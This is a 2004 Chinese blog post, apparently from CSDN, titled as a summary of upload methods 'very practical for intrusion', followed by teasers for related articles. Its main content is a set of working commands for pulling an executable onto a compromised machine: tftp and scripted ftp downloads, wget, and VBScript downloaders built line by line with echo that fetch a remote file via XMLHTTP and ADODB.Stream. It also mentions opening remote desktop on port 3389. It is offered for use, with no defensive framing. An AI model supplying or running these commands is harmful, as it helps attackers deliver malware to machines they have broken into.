上传方法总结[对入侵很实用]

原创 2004年10月18日 19:57:00

作者:小虾米  来自:朋友的家

现在将本人用于上传的方法进行汇总如下:

1. tftp法
先在自己某机器上建个tftp服务器,如执行tftpd32.exe,
再将文件(sample.exe)上传到别的机器中(肉鸡),
肉鸡cmd中执行: tftp -i 服务器ip get sample.exe

2. ftp法
肉鸡cmd中执行:
echo open ftp服务器ip [端口]>ftp.txt
echo username>>ftp.txt
echo password>>ftp.txt
echo get sample.exe>>ftp.txt
echo bye>>ftp.txt
ftp -s:ftp.txt
del ftp.txt

3. 工具法
利用wineggdrop的wget.exe
肉鸡cmd中执行:wget 网站/sample.exe

4. 利用dl.vbe法
肉鸡cmd中执行:
echo with wscript:if .arguments.count^<2 then .quit:end if >dl.vbe
echo set aso=.createobject("adodb.stream"):set web=createobject("microsoft.xmlhttp") >>dl.vbe
echo web.open "get",.arguments(0),0:web.send:if web.status^>200 then quit >>dl.vbe
echo aso.type=1:aso.open:aso.write web.responsebody:aso.savetofile .arguments(1),2:end with >>dl.vbe

cscript dl.vbe http://*。*。*。*:88/sample.exe sample.exe

5. 利用iget.vbe法
方法同4,
肉鸡cmd中执行:
echo iLocal = LCase(WScript.Arguments(1)) >iget.vbe
echo iRemote = LCase(WScript.Arguments(0)) >>iget.vbe
echo Set xPost = CreateObject("Microsoft.XMLHTTP") >>iget.vbe
echo xPost.Open "GET",iRemote,0 >>iget.vbe
echo xPost.Send() >>iget.vbe
echo Set sGet = CreateObject("ADODB.Stream") >>iget.vbe
echo sGet.Mode = 3 >>iget.vbe
echo sGet.Type = 1 >>iget.vbe
echo sGet.Open() >>iget.vbe
echo sGet.Write(xPost.responseBody) >>iget.vbe
echo sGet.SaveToFile iLocal,2 >>iget.vbe

cscript iget.vbe http://*。*。*。*/sample.exe sample.exe

6. 利用Http网站vbe法
echo Set xPost = CreateObject("Microsoft.XMLHTTP") >dsa.vbe
echo xPost.Open "GET","http://*.*.*.*/sample.exe",0 >>dsa.vbe
echo xPost.Send() >>dsa.vbe
echo Set sGet = CreateObject("ADODB.Stream") >>dsa.vbe
echo sGet.Mode = 3 >>dsa.vbe
echo sGet.Type = 1 >>dsa.vbe
echo sGet.Open() >>dsa.vbe
echo sGet.Write(xPost.responseBody) >>dsa.vbe
echo sGet.SaveToFile "sample.exe",2 >>dsa.vbe

cscript dsa.vbe
del dsa.vbe

7. 3389法
可以开3389,然后登陆,进行本地的下载。该方法对服务器上传很严格的机器特有效。(包括硬件防火墙)

8. 其他未公开的方法

使用迅捷思维导图制作一份精美的思维导图

如今思维导图无处不在,大到产品设计、活动策划,小到整理读书笔记等等。用思维导图都可以很方便的帮助我们发散思维、整理思绪,而一个精致美观的思维导图也能够更加的吸引眼球和注意力,那么怎么才能制作一封精美的...
  • wsxka
  • wsxka
  • 2018年01月26日 14:39
  • 112

网络入侵的几种常用方法

我认为这是一套适合初学者由浅到深的文章,所以强烈推荐给大家,作者从基础讲到最近比较火的漏洞,可能有些人看来是浅了些,但是的确很适合想干点啥但又不知道怎么办的菜鸟们 。第一节,伸展运动。这节操我们要准备...
  • liuguizhong
  • liuguizhong
  • 2007年12月08日 23:17
  • 2751

[免费]程序员辅助工具

http://download.csdn.net/source/196214热键为*号
  • lovingkiss
  • lovingkiss
  • 2007年06月18日 11:14
  • 1242

aspx web入侵渗透经验总结

对一般遇到.net的网站时      1、通常会注册个用户    第一选择利用上传判断的漏洞 加图片头GIF89A 顺利饶过    2、    第二种就是注入了, 在?id=xx后加单引号 '...
  • ccx_john
  • ccx_john
  • 2013年12月26日 19:28
  • 2250

入侵Tomcat服务器一次实战描述

到网上随便逛逛,我就会发现用JSP制作的电子商务网站多如牛毛,从JSP日渐繁荣的局面来看,适合于各种平台而且免费的Tomcat逐渐成为WEB服务器的一种选择。eBay.com与Dell计算机等知名网站...
  • sinat_31998357
  • sinat_31998357
  • 2015年10月21日 11:58
  • 1736

网站入侵的攻击方法和原理

前言闲话 声明:此文不教大家怎么破解做坏银,而是攻击方法与原理,知己知彼,才能防好自己的密码; 嗨!各位小伙伴们,又到周六了。有人还在加班,有人已经带着GirlFriend逛街去了,今天我依然一个人,...
  • qq348843576
  • qq348843576
  • 2015年05月16日 09:00
  • 3904

入侵服务器的一种方法

实现通过远程命令行来实现对服务器入侵的一种方法
  • zhang_ruiqiang
  • zhang_ruiqiang
  • 2016年12月19日 19:05
  • 3857

入侵指定网站的思路~菜鸟必学

首先,观察指定网站。 入侵指定网站是需要条件的: 要先观察这个网站是动态还是静态的。 首先介绍下什么样站点可以入侵:我认为必须是动态的网站 如ASP、PHP、 JSP等代码编写的站 点 ...
  • u012191462
  • u012191462
  • 2015年10月20日 15:09
  • 7969

常用shell命令总结,非常实用

man 命令  查询命令说明 1、cat  zcat cat file1 file2 可以显示两个文件的内容 cat -n file1 可以为文件增加行号 cat file1 file...
  • duomengwuyou
  • duomengwuyou
  • 2016年04月07日 18:54
  • 209

C/C++实战实用知识点记录

C/C++实战实用知识点记录1.extern “C”用法。  extern “C”可分为两个部分理解。extern表示这部分的函数或变量可在其他模块中使用。”C”表示该部分的函数采用C的编译方式编译,...
  • shiyimin1
  • shiyimin1
  • 2016年07月16日 17:04
  • 343
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:上传方法总结[对入侵很实用]
举报原因:
原因补充:

(最多只允许输入30个字)